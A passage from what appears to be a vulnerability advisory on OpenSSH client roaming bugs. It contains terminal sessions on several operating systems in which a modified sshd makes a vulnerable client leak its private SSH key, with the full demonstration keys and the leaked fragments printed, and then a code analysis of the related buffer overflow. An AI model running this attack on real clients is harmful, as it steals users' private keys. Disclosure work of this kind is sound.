MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme
Private Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key
$ head -n 1 /etc/motd FreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013
$ /usr/bin/ssh -V OpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= -----END DSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:768" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-9448bb7f/infoleak
MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To ...
env ROAMING="client_out_buf_size:1024" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-279f5e2b/infoleak
... iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= ...
Private Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013
$ /usr/bin/ssh -V OpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:2048" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-35ee7ab0/infoleak
MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-6cb31d82/infoleak
... uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=
Private Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
$ /usr/bin/ssh -V OpenSSH_7.0, LibreSSL 2.2.2
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL ruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s 17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8 L/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh xSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP vavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl Jka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP Kyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19 qJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY gQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK QolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt gKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL cQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB +s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl hcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri hBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh vhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O nFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG 8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg== -----END RSA PRIVATE KEY-----
"pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 1 %h %p" -p 222 127.0.0.1 [connection suspended, press return to resume]Segmentation fault (core dumped)
(this example requires a ProxyCommand because of the NULL-aitop bug described in the Mitigating Factors of the Information Leak section, and crashes because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section)
cat /tmp/roaming-a5eca355/infoleak
ry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
Private Key Disclosure example: CentOS 7, 1024-bit DSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="CentOS Linux 7 (Core)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n GLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2 hUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4= -----END DSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-b7b16dfc/infoleak
jJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5
strings /tmp/roaming-b324ce87/infoleak
IuQL R2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9v
strings /tmp/roaming-24011739/infoleak
KjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC
strings /tmp/roaming-37456846/infoleak
LsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA yq4Kwj/
strings /tmp/roaming-988ff54c/infoleak
GBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
strings /tmp/roaming-53887fa5/infoleak
/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4
Private Key Disclosure example: Fedora 20, 2048-bit RSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="Fedora 20 (Heisenbug)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz HLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp o9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ /B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy 2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr Hiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa jwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm qK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5 r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+ ZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU= -----END RSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-a2bbc5f6/infoleak
cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG
strings /tmp/roaming-47b46456/infoleak
RGAcE0nc GCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9
strings /tmp/roaming-7a6717ae/infoleak
cawMW4LZ1 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p
strings /tmp/roaming-f3091f08/infoleak
lZ3w0qHe nSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
strings /tmp/roaming-62a9e9a3/infoleak
lZ3w0qHe r3TwTa0pPEk11 LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37P
strings /tmp/roaming-8de31ed5/infoleak
7qyvNznQ 26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
strings /tmp/roaming-f5e0fbcc/infoleak
yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxS
strings /tmp/roaming-9be933df/infoleak
QRtzK/GpRuMC1 C3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT
strings /tmp/roaming-ee4d1e6c/infoleak
SG3aTqYp tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s
strings /tmp/roaming-c2bfd69c/infoleak
SG3aTqYp 6JmTOun5zVV6A H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s
strings /tmp/roaming-2b3217a1/infoleak
DGLfFGdO r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ
strings /tmp/roaming-1e275747/infoleak
g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+
======================================================================== Buffer Overflow (CVE-2016-0778) ========================================================================
Analysis
Support for roaming was elegantly added to the OpenSSH client: the calls to read() and write() that communicate with the SSH server were replaced by calls to roaming_read() and roaming_write(), two wrappers that depend on wait_for_roaming_reconnect() to transparently reconnect to the server after a disconnection. The wait_for_roaming_reconnect() routine is essentially a sequence of four subroutines:
239 int 240 wait_for_roaming_reconnect(void) 241 { ... 250 fprintf(stderr, "[connection suspended, press return to resume]"); ... 252 packet_backup_state(); 253 / TODO Perhaps we should read from tty here / 254 while ((c = fgetc(stdin)) != EOF) { ... 259 if (c != '\n' && c != '\r') 260 continue; 261 262 if (ssh_connect(host, &hostaddr, options.port, ... 265 options.proxy_command) == 0 && roaming_resume() == 0) { 266 packet_restore_state(); ... 268 fprintf(stderr, "[connection resumed]\n"); ... 270 return 0; 271 } 272 273 fprintf(stderr, "[reconnect failed, press return to retry]"); ... 275 } 276 fprintf(stderr, "[exiting]\n"); ... 278 exit(0); 279 }
-
packet_backup_state() close()s connection_in and connection_out (the old file descriptors that connected the client to the server), and saves the state of the suspended SSH session (for example, the encryption and decryption contexts).
-
ssh_connect() opens new file descriptors, and connects them to the SSH server.
-
roaming_resume() negotiates the resumption of the suspended SSH session with the server, and calls resend_bytes().
-
packet_restore_state() updates connection_in and connection_out (with the new file descriptors that connect the client to the server), and restores the state of the suspended SSH session.
The new file descriptors for connection_in and connection_out may differ from the old ones (if, for example, files or pipes or sockets are opened or closed between two successive ssh_connect() calls), but unfortunately historical code in OpenSSH assumes that they are constant:
-
In client_loop(), the variables connection_in and connection_out are cached locally, but packet_write_poll() calls roaming_write(), which may assign new values to connection_in and connection_out (if a reconnection occurs), and client_wait_until_can_do_something() subsequently reuses the old, cached values.
-
client_loop() eventually updates these cached values, and the following FD_ISSET() uses a new, updated file descriptor (the fd connection_out), but an old, out-of-date file descriptor set (the fd_set writeset).
-
